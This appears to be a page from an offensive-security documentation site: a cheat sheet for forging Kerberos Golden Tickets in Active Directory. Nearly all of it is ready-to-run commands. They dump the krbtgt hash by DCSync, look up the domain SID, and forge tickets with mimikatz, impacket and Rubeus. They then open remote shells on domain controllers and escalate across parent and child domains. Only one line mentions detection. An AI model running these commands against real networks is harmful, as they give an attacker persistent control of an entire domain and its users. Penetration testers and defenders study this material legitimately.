Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Forge TGT signed with krbtgt hash. Grants access to any service in domain. Requires: krbtgt NTLM hash, domain SID, domain name.
Get krbtgt Hash
DCSync
impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user krbtgt
Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
Get Domain SID
impacket-lookupsid DOMAIN/user:password@DC_IP
Get-ADDomain | Select DomainSID
whoami /user # Strip last RID
Forge — Mimikatz
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:NTLM_HASH /ptt
Save to File
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:NTLM_HASH /ticket:golden.kirbi
Forge — Impacket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local Administrator
Use
export KRB5CCNAME=Administrator.ccache
impacket-psexec domain.local/Administrator@DC -k -no-pass
impacket-wmiexec domain.local/Administrator@DC -k -no-pass
Forge — Rubeus
.\Rubeus.exe golden /rc4:KRBTGT_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt
Inject & Use
mimikatz # kerberos::ptt golden.kirbi
klist
dir \\DC\C$
psexec.exe \\DC cmd.exe
Inter-Realm (Cross-Domain)
mimikatz # kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:S-1-5-21-PARENT-SID-519 /ptt
-519) from parent domain.
Notes
- Golden ticket valid for 10 years by default
- Works even if user doesn’t exist
- Survives password resets (until krbtgt rotated twice)
- Detection: TGT with long lifetime, non-existent user
Quick Reference
| Task | Command |
|---|
| Get krbtgt | secretsdump -just-dc-user krbtgt |
| Forge (Mimikatz) | kerberos::golden /user:Admin /krbtgt:HASH /ptt |
| Forge (Impacket) | impacket-ticketer -nthash HASH -domain-sid SID |
| Use | export KRB5CCNAME=Admin.ccache → -k -no-pass |